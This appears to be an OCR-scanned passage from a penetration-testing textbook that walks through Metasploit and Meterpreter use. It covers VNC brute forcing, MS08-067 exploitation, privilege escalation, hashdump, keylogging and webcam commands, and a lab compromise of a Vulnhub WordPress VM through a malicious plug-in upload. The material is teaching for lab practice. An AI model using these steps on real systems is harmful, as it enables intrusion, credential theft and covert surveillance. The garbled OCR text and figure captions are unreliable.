S.product=Linux os.version=8.04 service.protocol=ssh fingerprint _db=ssh.banner ) 

*] Scanned 1 of 1 hosts (108% complete) 

*) Auxiliary module execution completed 

msf auxiliary(scanner/ssh/ssh_version) > fj 


Figure 3-40. The output of the auxiliary module ssh_version 


VNC 


Virtual Network Computing (VNC) is a protocol used for graphical remote 
administration. Metasploit has several modules for the enumeration and 
exploitation of VNC. Figure 3-41 shows the use of the auxiliary/scanner/ 
vnc/vnc_login module. You need to set the value of the RHOST variable to 
the IP address of your target system. The module uses a built-in password 
dictionary and attempts a brute-force attack. Once the module completes 
execution, it gives you the VNC password that you can use to log in. 
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root@habl /ins/share/metzspit-framework/modutes ooo 


Figure 3-41. The output of the auxiliary module vnc_login 


Meterpreter Basics 


Meterpreter is the abbreviation for the Metasploit Interpreter. It is 

an advanced Metasploit payload that uses in-memory DLL injection 
techniques to interact with a target system. It offers several useful post- 
exploitation tools and utilities. 


Meterpreter Commands 


Meterpreter is an advanced payload for performing various post- 
exploitation activities. The following are some of the essential commands 
that can help you navigate through Meterpreter. 


Core Commands 


Table 3-1 describes a set of core Meterpreter commands that can help you 
with various session-related tasks on your target system. 
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Table 3-1. Meterpreter Commands 


Command Description 

? Displays the help menu 

background Backgrounds the current session 

bgkill Kills a background Meterpreter script 

bglist Lists running background scripts 

bgrun Executes a Meterpreter script as a background 
thread 

channel Displays information or controls active channels 

close Closes a channel 


disable unicode_ 
encoding 


enable _unicode_ 
encoding 


exit 
get_timeouts 
guid 

help 

info 

irb 

load 


machine_id 


migrate 


Disables encoding of Unicode strings 


Enables encoding of Unicode strings 


Terminates the Meterpreter session 

Gets the current session timeout values 
Gets the session GUID 

Displays the Help menu 

Displays information about a post module 
Drops into irb scripting mode 

Loads one or more Meterpreter extensions 


Gets the MSF ID of the machine attached to the 
session 


Migrates the server to another process 


(continued) 
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Table 3-1. (continued) 


Command Description 

pivot Manages pivot listeners 

quit Terminates the Meterpreter session 

read Reads data from a channel 

resource Runs the commands stored in a file 

run Executes a Meterpreter script or post module 
sessions Quickly switches to another session 


set_timeouts 


sleep 


transport 
uuid 


write 


Sets the current session timeout values 


Forces Meterpreter to go quiet and then re- 
establishes the session 


Changes the current transport mechanism 
Gets the UUID for the current session 


Writes data to a channel 


Stdapi: System Commands 


Table 3-2 describes a set of essential system commands that provide an 


array of system tasks such as process list and kill, execute commands, 


reboot, and so on. 
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Table 3-2. System Commands 


Command 


clearev 
drop_token 
execute 
getenv 
getpid 


getprivs 


getsid 
getuid 
kill 
localtime 
pgrep 
pkill 

ps 
reboot 
reg 
rev2self 
shell 


shutdown 


steal_token 


suspend 


sysinfo 


Description 


Clears the event log 

Relinquishes any active impersonation token 
Executes a command 

Gets one or more environment variable values 
Gets the current process identifier 


Attempts to enable all privileges available to the 
current process 


Gets the SID of the user who the server is running as 
Gets the user who the server is running as 
Terminates a process 

Displays the target system’s local date and time 
Filters processes by name 

Terminates processes by name 

Lists running processes 

Reboots the remote computer 

Modifies and interacts with the remote registry 
Calls RevertToSelf() on the remote machine 
Drops into a system command shell 

Shuts down the remote computer 


Attempts to steal an impersonation token from the 
target process 


Suspends or resumes a list of processes 


Gets information about the remote system, such as 
the OS 
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Stdapi: User Interface Commands 


Table 3-3 lists the commands that help you get remote screenshots and the 
keystrokes from the target system. 


Table 3-3. User Interface Commands 


Command Description 


enumdesktops Lists all accessible desktops and window stations 
getdesktop Gets the current Meterpreter desktop 

idletime Returns the number of seconds the remote user has been idle 
keyscan_dump Dumps the keystroke buffer 

keyscan_start Starts capturing keystrokes 


keyscan_stop Stops capturing keystrokes 


screenshot Grabs a screenshot of the interactive desktop 
setdesktop Changes the Meterpreter’s current desktop 
uictl Controls some of the user interface components 


Stdapi: Webcam Commands 


Table 3-4 describes the commands that can be effective in getting 
live pictures and video streaming from the webcam attached to your 
compromised system. 
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Table 3-4. Webcam Commands 


Command Description 

record _mic Records audio from the default microphone for x seconds 
webcam_chat Starts a video chat 

webcam_list Lists webcams 

webcam_snap Takes a snapshot from the specified webcam 
webcam_stream Plays a video stream from the specified webcam 


Stdapi: Audio Output Commands 


Table 3-5 describes a command that helps you play audio files on a 
compromised system. 


Table 3-5. Audio Output Command 


Command Description 


play Plays an audio file on a target system, with nothing written on disk 


Priv: Elevate Commands 


Table 3-6 describes a command that helps you escalate privileges to the 
highest possible level, possibly root or administrator. 


Table 3-6. Elevate Commands 


Command Description 


getsystem Attempts to elevate your privilege to that of the local system 
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Priv: Password Database Commands 


Table 3-7 describes a command that helps you get the raw password 
hashes from the compromised system. 


Table 3-7. Password Database Commands 


Command Description 


hashdump Dumps the contents of the SAM database 


Priv: Timestomp Commands 


Table 3-8 describes a command that is part of Metasploit’s antiforensic 
capabilities. 


Table 3-8. Timestomp Commands 


Command Description 


timestomp Manipulates a file’s MACE attributes 


Using Meterpreter 


To get familiar with Meterpreter, let’s first get remote access to a target 
system using the SMB MS08-067 netapi vulnerability, as shown in 
Figure 3-42. The exploit was successful, and you get the Meterpreter shell. 
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root@kall: ~ o0 
File Edit View Search Terminal Help 
msf > use exploit/windows/smb/ms08 067 netapi a 
msf exploit (windows/smb/ms08 067 netapi) > show options 


Module options (exploit/windows/smb/ms@8 667 _netapi): 


Nane Current Setting Required Description 

RHOST yes The target address 

RPORT 445 yes The SMB service port (TCP) 

SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC) 


Exploit target 
Id Name 


@ Automatic Targeting 


mat exploit (windows/smb/ms08_067_netapi) > set RHOST 192.168.25.130 
RHOST => 192. 168.25.130 
msf exploit (windows/smb/ms08_067_netapi) > exploit 


Started reverse TCP handler on 192.168.25.128:4444 

192. 168.25.130:445 - Automatically detecting the target... 

192.168. 25.130:445 Fingerprint: Windows XP - Service Pack 3 Lang: English 

192.168.25.130:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX) 

192.168.25.130:445 - Attempting to trigger the vulnerability... 

Sending stage (179779 bytes) to 192,168.25,130 

Meterpreter session 1 opened (192.168.25.128:4444 -> 192.168.25.130:1412) at 2018-09-24 15:30:22 +0530 


meterpreter > J 


Figure 3-42. Successful exploitation of the target system using the 
exploit ms08_067_netapi 


sysinfo 


Once you have compromised the target using an exploit, you need to check 
some basic details about the target such as the exact operating system 
version, computer name, domain, architecture, and so on. Meterpreter 
offers a command called sysinfo that can be used to gather basic 
information about the target, as shown in Figure 3-43. 


root@kall: ~ o0 
File Edt View Search Terminal Help 
mst exploit(windows/smb/ms08_067_netapi) > exploit a 


*] Started reverse TCP handler on 192.168.25.128:4444 
] 192.168.25.130:445 - Automatically detecting the target... 
] 192.168.25.130:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English 
*] 192.168.25.130:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX) 
[*] 192.168.25.130:445 - Attempting to trigger the vulnerability.. 
*] Sending stage (179779 bytes) to 192.168.25.130 
*) Meterpreter session 2 opened (192.168.25.128:4444 -> 192.168.25.130:1452) at 2018-09-24 16:00:42 +0530 


meterpreter > sysinfo 


Computer SAGAR- C51B4AADE 

os : Windows XP (Build 2680, Service Pack 3). 
Architecture : x86 

System Language : en_US 

Domain : MSHOME 

Logged On Users : 1 

Meterpreter : x86/windows 


> 


Figure 3-43. The output of the sysinfo command within Meterpreter 
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Is 


The Meterpreter 1s command can be used to list the files in the current 


directory on the compromised system, as shown in Figure 3-44. 


File Edit View Search Terminal Help 


root@kali: = 


[+] 192.168.25.130:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English 
[*] 192.168.25.130:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX) 
[*] 192.168.25.130:445 - Attempting to trigger the vulnerability... 

[*] Sending stage (179779 bytes) to 192.168.25.130 
[*] Meterpreter session 3 opened (192.168.25.128:4444 


> ls 


neterpreter 
„isting: C:\WINDOWS\system32 


tode 


LO0666/ rW- rW- rw- 
10777/rwxrwxrwx 
10777/rwxrwxrwx 
10777/rwxrwxrwx 
10777/ rwx rwx rwx 
10777/ rwx rwx rwx 
10777/ rwx rwx rwx 
10777/ rwx rwx rwx 
10777/rWx rwx rwx 
LOOGGG/ rw- rw- rw- 
LO0G6G/ rw- rw- rw- 
10777/ rwx rwx rwx 
10777/ rwxrwx rwx 
10777/ rwx rwx rwx 
LOO666/ rw- rw- rw- 
LOOGGG/ rw- rw- rw- 
LOOGGG/ rw- rw- rw- 
LOOGGG/ rw- rw- rw- 
LOOGGG/ rw- rw- rw- 
LO0666/ rw- rw- rw- 
L00666/ rw- rw- rw- 
10777/ rwx rwx rwx 
10777/ rwx rwxrwx 
40777/rwxrwxrwx 
100666/rw-rw-rw- 
LOOGGG/ rw- rw- rw- 
10777/ rax rwx rwx 
LO0666/ rw- rw- rw- 
L00666/ rw- rw- rw- 
10777/ WX Wx TWX 
t00444/r--r--r-- 
100666/rw-rw-rw- 
LOOGGG/ rw- rw- rw- 
LOOGGG/ rw- rw- rw- 
100666/ rw- rw- rw- 
10777/ rwx rwx rwx 
10777/ rwxrwxrwx 
10777/ AX rwx rwx 
L00666/rw-rw-rw- 
4O777/ rwxrwxrwx 
10777/ rwxrwxrwx 
10777/rwxrwxrwx 
107777 rexrwxrwe 


100352 
1688 
2577 
2577 
66082 
66082 
66082 
o 

e 

o 

o 
1804 


o 
103424 
90296 
o 

6656 
297984 
177152 
68608 
159232 
o 


Type 
fil 
dir 
dir 
dir 
dir 
dir 
dir 
dir 
dir 
fil 
fil 
dir 
dir 
dir 
fil 
fil 
fil 
fil 
fil 
fil 
fil 
dir 
dir 
dir 
fil 
fil 
dir 
fil 
fil 
dir 
fil 
fil 
fil 
fil 
fil 
dir 
dir 
dir 
fil 
dir 
dir 
dir 
dir 


Last modified 


2017-01-24 
2017-01-24 
2017-01-24 
2017-01-24 
2017-01-24 
2017-01-24 
2017-01-24 
2017-01-24 
2017-01-24 
2001-08-23 
2001-08-23 
2017-01-24 
2017-01-24 
2017-01-24 
2008-04-14 
2001-08-23 
2017-01-24 
2001-08-23 
2001-08-23 
2001-08-23 
2001-08-23 
2018-09-24 
2018-09-24 
2017-01-24 
2018-08-21 
2008-04-14 
2017-01-24 
2001-08-23 
2017-01-24 
2017-01-24 
2001-08-23 
2008-04-14 
2008-04-14 
2008-04-14 
2008-04-14 
2017-01-24 
2017-01-24 
2017-01-24 
2018-08-14 
2017-01-24 
2017-01-24 
2017-01-24 
2817-81-24 


09:19:43 
14:24:43 
14:24:43 
14:24:43 
14:24:57 
14:24:43 
14:24:43 
14:24:43 
14:24:43 
16:30:00 
16:30:00 
14:24:43 
14:24:43 
14:24:43 
10:11:50 
16:30:00 
09:16:14 
16:30:00 
16:30:00 
16:30:00 
16:30:00 
15:33:19 
15:31:18 
09:12:16 
14:55:17 
10:25:28 
09:13:18 
16:30:00 
09:20:20 
14:24:43 
16:30:00 
10:12:00 
10:10:08 
10:12:00 
10:12:00 
09:13:08 
09:20:38 
09:12:04 
09:52:56 
09:24:31 
09:20:57 
14:26:13 
14:24:43 


-> 192.168.25.1360:1453) at 2018-09-24 16:03:59 +0530 


Name 


+0530 Swinnt$.inf 
+0530 1025 

+0530 1028 

+0530 1631 

+0530 1033 

+0530 1037 

+0530 1041 

+0530 1042 

+0530 1054 

+0530 12520437. cpx 
+0530 12520850. cpx 
+0530 2052 

+0530 3076 

+0530 3com dmi 
+0530 6tossvc. dll 
+0530 AUTOEXEC.NT 
+0530 CONFIG.NT 
+0530 CONFIG.TMP 
+0530 C 28594.NLS 
+0530 C 28595.NLS 
+0530 C 28597.NLS 
+0530 CatRoot 
+0530 CatRoot2 
+0530 Com 

+0530 Confidential. txt.txt 
+0530 Dcache.bin 
+0530 DirectX 
+0530 EqnClass.01L 
+0530 FNTCACHE.DAT 
+0530 IME 

+0530 KBDAL.OLL 
+0530 MSCTF.dll 
+0530 MSCTFIME. IME 
+0530 MSCTFP. dtl 
+0530 MSINTF. dll 
+0530 Macromed 
+0530 Microsoft 
+0530 MsDtc 

+0530 PerfStringBackup. INI 
+0530 ReinstallBackups 
+0530 Restore 
+0530 Setup 

+0530 ShellExt 


Figure 3-44. The output of the auxiliary ls command in the 
Meterpreter listing of files on the remote compromised system 
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getuid 


Once you have gotten access to the target system, you must understand 
what user privileges you have on the system. Having the root or 
administrator-level privileges is the most desirable, and a lower privilege 
access implies lots of restrictions on your actions. Meterpreter offers a 
command called getuid, as shown in Figure 3-45, that checks for the 
current privilege level on the compromised system. 


root@iall: ~ -Eo 

File Edit View Seach Terminal Help 
msf exploit (windows/smb/ms08_067_netapi) > exploit 

*] Started reverse TCP handler on 192.168.25.128:4444 

] 192.168.25.130:445 - Automatically detecting the target 

*] Fingerprint: Windows XP - Service Pack 3 - lang:English 

} 445 - Selected Target: Windows XP SP3 English (AlwaysOn NX) 

*) 445 - Attempting to trigger the vulnerability.. 

} 4 a 179779 bytes) to 192.168.25.130 

*] Meterpreter session 4 opened (192.168.25.128:4444 -> 192.168.25.130:1456) at 2018-09-24 16:07:53 +0530 
meterpreter > getuid 
Server username: NT AUTHORITY\SYSTEM 
meterpreter > J 


Figure 3-45. The output of the getuid command in Meterpreter 


getsystem 


Once you have gained access to the target system using an applicable 
exploit, the next logical step is to check for privileges. Using the getuid 
command, you have already gauged your current privilege level. You 

may not have gotten root or administrator-level access. so to maximize 
the attack penetration, it is important to elevate your user privileges. 
Meterpreter helps you escalate privileges. Once a Meterpreter session is 
opened, you can use the getsystem command, as shown in Figure 3-46, to 
escalate privileges to that of an administrator. 


117 


CHAPTER 3 METASPLOIT 


root@kall: ~ ooo 
File Edit View Search Terminal Help 
maf exploit (windows/smb/ms08_067_netapi) > exploit a 


Started reverse TCP handler on 192. 168.25.128:4444 

*] 192.168.25.130:445 - Automatically detecting the target 

*] 192.168.25.130:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English 

*] 192.168.25.130:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX) 

*) 192.168.25.130:445 - Attempting to trigger the vulnerability.. 

*] Sending stage {179779 bytes) to 192, 168.25.130 

*] Meterpreter session 7 opened (192.168.25.128:4444 -> 192.168.25.130:1483) at 2018-89-24 16:14:02 +0530 


meterpreter > getsystem 


got system via technique 1 (Named Pipe Impersonation (In Nemory/Admin) ) 
meterpreter > $ 


Figure 3-46. The output of the getsystem command in Meterpreter 


screenshot 


After a system compromise, it is interesting to get a glimpse of the desktop 
GUI running on the target system. Meterpreter offers a utility known as 
screenshot, as shown in Figure 3-47. It simply takes a snapshot of the 
current desktop on the target system and saves it in the local root folder. 


root@kall: ~ eoo°9o 
File Edit View Search Terminal Help 
msf exploit (windows/smb/ms08_067_netapi) > exploit ve 


Started reverse TCP handler on 192.168.25.128:4444 

192. 168.25.130:445 - Automatically detecting the target... 

192.168.25.130:445 - Fingerprint: Windows XP - Service Pack 3 - Lang:English 

192. 168.25.130:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX) 

192.168.25.130:445 - Attempting to trigger the vulnerability.. 

Sending stage (179779 bytes) to 192.168.25.130 

Meterpreter session 5 opened (192.168.25.128:4444 -> 192.168.25.130:1459) at 2018-09-24 16:69:38 +0530 


meterpreter > screenshot 
Screenshot saved to: /root/EwATCQQp-jpeg 
meterpreter > §f 


Figure 3-47. The output of the screenshot command in Meterpreter 


Figure 3-48 shows the desktop screen captured from a compromised 
system. 
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Figure 3-48. The screenshot of a desktop running on a remote 
compromised system 


hashdump 


After a successful system compromise, you certainly will want to get the 
credentials of different users on that system. Once a Meterpreter session 
is opened, you can use the hashdump command to dump all the LM and 
NTLM hashes from the compromised system, as shown in Figure 3-49. 
Once you have these hashes, you can feed them to various offline hash 
crackers and retrieve passwords in plain text. 


root@kall: ~ 9o00 
File Edit View Search Terminal Help 
*) 192.168.25.130:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English io 
[*] 192.168.25.130:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX) 
*)] 192.168.25.130:445 - Attempting to trigger the vulnerability... 
[*] Sending stage (179779 bytes) to 192.168.25.130 
*] Meterpreter session 6 opened (192.168.25.128:4444 -> 192. 168.25,130:1482) at 2018-09-24 16:12:49 +0530 


meterpreter > hashduap 

Administrator 508: ce8f39elcfeB1 lac 1aa818381e4e28 1b: b4bbaa79f275ab84519f 176082 f cB6tt: : : 
Guest: 501: aad3b435b51404eeaad3b435b51484ee: 31d6c feed 16ae931b73C59d7e8CO89C8: :: 
HelpAssistant : 1600: 1dfb83c2aeb861b2cecS06cca316f ce? : 812db87e1¢4823dca8SF327767ebi6a4: :: 
shareuser: 1063; 16d412bd764f fe81aad3b435b51404e¢e : 209¢6174da49Gcaeb422f3fa5a7ae634: :: 
SUPPORT _388945a0 : 1002 : aad3b435b51404eeaad3b435b5 1484ee : 9b7dc3244a0f2151619264983a168d5d: 
test: moe ay ceed archi era a i ee ane 33 
meterpreter > 


Figure 3-49. The output of the auxiliary module vnc_login 


119 


CHAPTER 3. METASPLOIT 


Searchsploit 


So far you have learned that Metasploit has a rich collection of auxiliaries, 
exploits, payloads, encoders, and so on. However, at times an exploit code 
for a certain vulnerability might not exist in Metasploit. In such a case, you 
may need to import the required exploit into Metasploit from an external 
source. Exploit-DB is a comprehensive source of exploits for various 
platforms, and Searchsploit is a utility that helps search for a particular 
exploit in Exploit-DB. Figure 3-50 shows the use of the Searchsploit tool to 
look for uTorrent-related exploits. 


Figure 3-50. The use of the Searchsploit tool to search for exploits 
related to uTorrent 


Summary 


This chapter introduced you to the various aspects of Metasploit, starting 
from the framewnd auxiliaries againork structure to using exploits ast 
services. You also learned how to leverage Metasploit capabilities to 
integrate NMAP and OpenVAS. Having learned about various Metasploit 
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payloads, auxiliaries, and exploits, in the next chapter you'll learn to apply 


these skills to exploit a vulnerable machine. 


Do-It-Yourself (DIY) Exercises 


Browse through the Metasploit directory and 
understand its structure. 


Try various commands such as set, setg, unset, 
unsetg, spool, and more. 


Initiate an NMAP scan from MSFconsole. 


Perform a vulnerability assessment on the target 
system using OpenVAS from within MSFconsole. 


Explore various auxiliary modules and use them to 
scan services such as HTTP, FTP, SSH, and so on. 


Try different features of Meterpreter such as getsystem 
and hashdump. 
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Use Case 


In the previous three chapters, you got acquainted with the essential tools 
NMAP, OpenVAS, and Metasploit. You learned about each of the tools 
in detail as well as how they can be integrated with each other for better 
efficiency. 

Now it’s time to put all that knowledge together and apply it ina 
practical scenario. In this chapter, you'll apply the various techniques 
you've learned so far to exploit a vulnerable system and get access to it. 


Creating a Virtual Lab 


It may not always be possible to try your newly learned skills on live 
production systems. Hence, you can try your skills in your own virtual lab 
in a restricted manner. 

Vulnhub (https: //www.vulnhub. com) is a site that provides systems 
for download that are deliberately made vulnerable. You simply need to 
download a system image and boot it in VirtualBox or VMware. 

For the purposes of this case study, go to https: //www. vulnhub. com/ 
entry/basic-pentesting-1,216/ and download the system. Once you’ve 
downloaded it, boot it using either VirtualBox or VMware. The initial boot 
screen for the system looks like Figure 4-1. 
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marlinspike 


Guest Session 


ubuntu® 16.04 LTS 


Figure 4-1. Initial boot screen of target system 


You do not have any credentials to log in to the system, so you will have 
to use your pen testing skills to get inside. 


Carrying Out Reconnaissance 


In Kali Linux, launch ZENMAP to perform a port scan and service 
enumeration on this target, as shown in Figure 
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Zenmap 
Scan Tools Profile Help 


Target: 192.168.25.132 v Profile: [intense scan 


Command: | nmap -T4 -A -v 192.168.25.132 


Services | Nmap Output | Ports /Hosts Topology Host Details Scans 


OS Host [nmap -T4 -A -v 192,168, 25.132 

Soep sesos Servaes CCR au aorte Veio UNUpUSE O VO Cauvo ula twee? 
| ss. vtesec (192.14 Initiating 0S detection (try #1) against vtcsec (192.168.25.132) 

NSE; Script scanning 192.168.25.132. 

Initiating NSE at 13:42 

Completed NSE at 13:42, 0.39s elapsed 

Initiating NSE at 13:42 

Completed NSE at 13:42, 0.00s elapsed 

Nmap scan report for vtcsec (192.168.25.132) 

Host is up (0.00175 latency). 

Not shown: 997 closed ports 

PORT STATE SERVICE VERSION 

21/tcp open ftp ProFTPD 1.3.30 

22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linu: 

| ssh-hostkey: 

| 2048 d6:0 


protocol 2.0) 


18:39: 2d: Bf: 46: fb:03:86:73:b3:3c:54:7e:54 (RSA) 
| 286 f1:f3:co a4:85:77:13:9a:d bb: 44:93:04 (ECDSA) 
|_ 256 12:€2:98:d2:a3:e7:36:4f:be:6b:ce:36:6b:7e:0d:9e (EdDSA) 
80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) 

| http-methods: 

|_ Supported Methods: GET HEAD POST OPTIONS 
|_http-server-header: Apache/2.4.18 (Ubuntu) 

|_http-title: Site doesn't have a title (text/html). 

MAC Address: 00:0C:29:4C:BB:59 (VMware) 

Device type: general purpose 

Running: Linux 3.X]4.X 

OS CPE: cpe:/o:linux:Linux_kernel:3 cpe:/o: linux: Linux_kernel:4 
OS details: Linux 3.2 - 4.8 

Uptime guess; 119.227 days (since Thu May 31 08:15:01 2018) 
Network Distance: 1 hop 

ICP Sequence Prediction: Difficulty=255 (Good luck!) 

IP ID Sequence Generation: All zeros 

Service Info; 05s: Unix, Linux; CPE: cpe:/o: linux: Linux kernel 


TRACEROUTE 
HOP RTT ADDRESS 
1 1.73 ms vtcsec (192.168.25.132) 


NSE: Script Post-scanning. 

Initiating NSE at 13:42 

Completed NSE at 13:42, 0.00s elapsed 
Initiating NSE at 13:42 

Completed NSE at 13:42, 0.00s elapsed 


Read data files from: /usr/bin/../share/nmap 
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . 
Neap done: 1 IP address (1 host up) scanned in 9.19 seconds 

az i Raw packets sent: 1023 (45.866KB) | Revd: 1015 (41.290KB) 


Figure 4-2. Output of NMAP intense scan done on the target system 


In the ZENMAP output, you can see that the following ports are open: 
e =Port 21 running ProFTPD 1.3.3c 
e Port 22 running OpenSSH 7.2p2 


e Port 80 running Apache httpd 2.4.18 
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Based on this output, you have three possible ways to compromise the 


system. 


e Search and execute any exploit for ProFTPD 1.3.3c in 
Metasploit 


e Brute-force user credentials against SSH running on 
port 22 


e Explore whether any application is hosted on port 80 


Exploiting the System 


When you try to access the system on port 80 using a browser, you will get 
the default web server page shown in Figure 4-3. 


Mozilla Firefox 
http://192.168.25.132/ x \ + 
€ > © 192.168,25,132 
E Most Visited» [Offensive Security “\ Kali Linux {Kali Docs “Kali Tools & Exploit-D8 h Aircrack-ng RA Kali Forums “\NetHunter @ Getting Started 


It works! 


This is the default web page for this server. 


The web server software is running but no content has been added, yet. 


Figure 4-3. The default landing web page on a target system 
(port 80) 


You will now go back to NMAP again, and this time instead of a port 
scan, you'll use the NMAP script http-enum, as shown in Figure 4-4. 
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Zenmap oe 0 
Scan Tools Profile Help 


Target: '192.168.25,132 Ty | Profile: v San 


Command: [nmap --script http-enum [192.168, 25.132 


Hosts | Services Nmap Output | Ports / Hosts Topology Host Details Scans 
os Host nmap -script http-enum 192.168.25.132 ¿| E [Detaits 


Starting Nmap 7.60 ( https://nmap.org ) at 2018-09-27 14:37 IST 

Nmap scan report for vtcsec (192.168.25.132) 

Host is up (@.00063s latency). 

Not shown: 997 closed ports 

PORT STATE SERVICE 

2l/tep open ftp 

22/tep open ssh 

80/tcp open http 

| http-enum 

I /secret/: Potentially interesting folder 
i 00:0C:29:4C:88:59 (VMware) 


Nmap done; 1 IP address (1 host up) scanned in 1.48 seconds 


E g 
Filter Hosts 


Figure 4-4. Output of the http-enum NMAP script executed on a 
target system 


The output of the script tells you that there’s a folder on the web server 
named secret, which might have something interesting for you. 

Having received inputs about the secret folder on the server, try 
accessing it, as shown in Figure 4-5. 
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tay sacret biog Aant ches WardP rems ute Maria Prete eco 


gos en Ok 


santy A Xai ime Nak Des QR Tees a Aap Ry Arena ZICH Foren Y Nenas @ Getty Sates 


‘Shep to content 
My secret biog 


My secret blog 


Just another WordPress site 


> Seral down to coment 


Posts 

Posted on November 10. 2017 

Hello world! 

Wedicaceo to WeedPress. This is your first pont BAR of delete A Hien start wilting 


Search for 


Recent Posts 
o ella acid! 
Recent Comments 
© A WorPress Commenter s Hedo morit 


Archives 


Figure 4-5. Browsing the secret directory hosted on the target web 
server 


You can see a screen that implies it is some kind of blog based on 
WordPress. However, the web page appears to be broken and incomplete. 

When you try to load the page, the browser looks for the vtcsec host. 
That means you need to configure your system to resolve this hostname. 
You can simply open the terminal and then open the file /etc/hosts in a 
text editor, as shown in Figure 4-6. 


Open ~ || & 


127.0.0.1 localhost 
127.0.1.1 kali 
192.168.25.132 vtcsec| 


# The following lines are desirable for IPv6 capable hosts 
Sica localhost ip6-localhost ip6- loopback 

ff02::1 ip6-allnodes 

ff02::2 ip6-allrouters 


Plain Text ~ Tab Width:8 ~ Ln 3, Col 22 X INS 


Figure 4-6. Editing the /etc/hosts file to add a new host entry 
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Next, add a new line: 192.168.25.132 vtcsec. 

In the terminal, run the following: gedit /etc/hosts. 

Now that you have made the necessary changes in the hosts file, let’s 
try to access the web interface once again. The interface loads, as shown in 


Figure 4-7. 


My secret blag - duet another WordPress site - Mocitia Fretes eco 


My secret tiag - dest ane. + 
~ tasa oo se 


aroy N Kalm N KA Does SA aois a pioto Anag EAE Fonn N Neuner @ Gatang States 


MY SECRET BLOG 


Figure 4-7. The home page ofa WordPress blog hosted on the target 
system 


By examining the page shown in Figure 4-8, it is evident that the 


application is based on WordPress. 
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Lag in: My sent biag — WordPress - Mesita Firefox eco 


Lag Py secretes + 
O TETE TE 


B tom 


Aru vamas Momms arty Ka Umer N Eat Docs Qaa Soa a pato D Areracning ZI ones Y Aunn G Gatang State 


WW) 


Figure 4-8. The WordPress login page on your target system 
Next, you require the credentials to get into the admin console of the 
application. You have three ways of getting them, as shown here: 


e Guess the credentials; many times default credentials 


work. 


e Use a password-cracking tool like Hydra to crack the 
credentials. 


e Use the Metasploit auxiliary module auxiliary/ 
scanner/http/wordpress login enumto launch a 
brute-force attack against the application credentials. 


In this case, the application has the default credentials of admin/admin. 
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Now that you have application credentials, you can use Metasploit 
to upload a malicious plug-in to WordPress, which will give you remote 
shell access. A WordPress plug-in is a ready-to-use piece of code that you 
can import into the WordPress installation to enable additional features. 
You can use the search command in MSFconsole to look for any exploits 
related to WordPress administration, as shown in Figure 4-9. 


root@kall: ~ o0 
File Edit View Search Terminal Help 
=[ metasploit v4.17.7-dev ] 
-=[ 1801 exploits - 1027 auxiliary - 311 post ] 
+ ++ -m [ 538 payloads - 41 encoders - 10 nops ] 
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ] 


msf > search wp admin 
| Module database cache not built yet, using slow search 


Matching Modules 


Name Disclosure Date Rank Description 
exploit/unix/webapp/wp admin shell_upload 2015-62-21 excellent WordPress Admin Shell Upload 
nsf >i 


Figure 4-9. Output of the search query for the wp_admin exploit in 
Metasploit 


You now need to use the exploit exploit/unix/webapp/wp_admin_ 
shell upload, as shown in Figure 4-10. You need to configure the 
parameters USERNAME, PASSWORD, TARGETURI, and RHOST. 
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File Edit View Search Terminal Help 


msf > use exploit/unix/webapp/wp_admin_ shell_upload 
msf exploit (unix/webapp/wp_admin_shell_upload) > show options 


Module options (exploit/unix/webapp/wp_ admin shell_upload): 


Name Current Setting Required Description 

PASSWORD admin yes The WordPress password to authenticate with 

Proxies no A proxy chain of format type:host:port[,type:host:port][... 
RHOST yes The target address 

RPORT 80 yes The target port (TCP) 

SSL false no Negotiate SSL/TLS for outgoing connections 

TARGETURI /secret/ yes The base path to the wordpress application 

USERNAME admin yes The WordPress username to authenticate with 

VHOST no HTTP server virtual host 


Payload options (php/meterpreter/reverse tcp): 


Name Current Setting Required Description 


LHOST 192.168.25.128 yes The listen address (an interface may be specified) 
LPORT 4444 yes The listen port 


Exploit target: 
Id Name 


6 WordPress 


msf exploit(unix/webapp/wp_admin_shell_upload) > set USERNAME admin 

USERNAME => admin 

msf exploit(unix/webapp/wp_admin_shell_upload) > set PASSWORD admin 

PASSWORD => admin 

msf exploit (unix/webapp/wp_admin_shell_upload) > set TARGETURI /secret/ 

TARGETURI => /secret/ 

msf exploit(unix/webapp/wp_admin_shell_upload) > set RHOST 192.168.25.132 

RHOST => 192.168.25.132 

msf exploit(unix/webapp/wp_admin_shell_upload) > exploit 

] Started reverse TCP handler on 192.168.25.128:4444 

] Authenticating with WordPress using admin:admin... 

] Authenticated with WordPress 

] Preparing payload... 

] Uploading payload... 

] Executing the payload at /secret/wp-content/plugins/ihsrbawiPk/gzoTqvzncp. php. .. 
] Sending stage (37775 bytes) to 192.168.25.132 

] Meterpreter session 1 opened (192.168.25.128:4444 -> 192.168.25.132:41586) at 2018-09-27 15:52:59 +0530 
] Deleted gzoTqvZncp.php 

[+] Deleted ihsrbawiPk.php 

[+] Deleted ../ihsrbawiPk 


meterpreter > fj 


Figure 4-10. The use of the exploit wp_admin_shell_upload against 
the target system to gain Meterpreter access 


The exploit ran successfully by uploading the malicious plug-in into 
WordPress and finally giving you the required Meterpreter access. 

During your initial NMAP scan, you discovered that your target was 
also running an FTP server on port 21. The FTP server version is ProFTPd 
1.3.3. You can check whether Metasploit has any exploit for this FTP server 
version. Use the search command. 
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Interestingly, Metasploit does have an exploit for the ProFTPd server. 


You can use exploit/unix/ftp/proftpd_133c_backdoor, as shown in 


Figure 4-11. All you need to configure is the RHOST variable. 


File Edt View Search Terminal Help 
msf > search proftpd 


Mot 


Module database cache not built yet, using slow search 


ching Modules 

Nane Disclosure Date Rank 
exploit/freebsd/ftp/proftp_telnet_iac 2016-11-01 great 
exploit/linux/ftp/proftp sreplace 2006-11-26 great 
exploit/lLinux/ftp/proftp telnet iac 2010-11-01 great 
exploit/linux/misc/netsupport manager agent 2011-01-08 average 
